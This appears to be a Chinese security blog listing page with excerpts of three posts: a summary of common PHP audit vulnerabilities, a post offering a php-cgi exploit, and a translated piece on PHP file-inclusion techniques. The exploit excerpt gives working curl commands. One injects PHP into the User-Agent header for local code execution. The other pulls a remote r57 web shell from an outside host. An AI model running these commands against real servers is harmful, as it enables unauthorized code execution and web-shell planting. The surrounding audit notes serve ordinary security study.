代码审计

代码审计:PHP代码审计常见漏洞总结

发表于4年前 | 作者: seay

0
简单总结下PHP代码审计常见漏洞,很浅显的东西,总结的不好的地方,欢迎指出,不断学习,不断钻研,才能不断进步,坚持下来,总有一天会搞懂它。 1.SQL注入漏洞 所有与数据库交互的地方都有可能存在SQL注入漏洞。 2.文件包含漏洞 include/include_once/require/require_once 3.XSS跨站漏洞 查看获取到字符串输入/输出是否进行处理 4.代码执行漏洞 PHP代码执行漏洞,常见的出现在危险函数上,过滤不严导......

实用工具

php-cgi漏洞利用EXP

发表于5年前 | 作者: seay

0
1、本地包含直接执行代码: curl -H “USER-AGENT: <?system(‘id’);die();?>” http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n   2、远程包含执行代码: curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt   如图:  

渗透测试

各种php包含漏洞替代技术总结

发表于5年前 | 作者: seay

0
作者:Anonymous 翻译:Don 来自:Silic Group Hacker Army 网站:http://blackbap.org 译注:如果文中有专业术语的翻译错误,还请原谅。 ================ php包含漏洞替代技术 ================ php开发者们犯得一个基本的错误是把一个不正当的变量传递给系统函数,特别是include()和require()这两个函数。 这个常见的错误导致了众所周知的远程文件包含漏洞和本地文件包含漏洞。在过去的几年中,php已......